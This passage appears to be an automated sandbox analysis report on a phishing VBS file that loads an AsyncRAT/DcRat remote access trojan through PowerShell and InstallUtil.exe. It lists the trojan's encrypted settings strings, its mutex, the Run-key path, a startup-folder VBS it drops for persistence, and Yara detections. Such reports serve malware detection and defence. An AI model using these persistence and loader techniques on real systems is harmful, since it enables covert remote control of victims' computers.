Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B788A push eax; ret
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B0D97 pushad ; ret
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B7717 push ebx; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC983CFF push edi; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC980C92 push ecx; iretd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
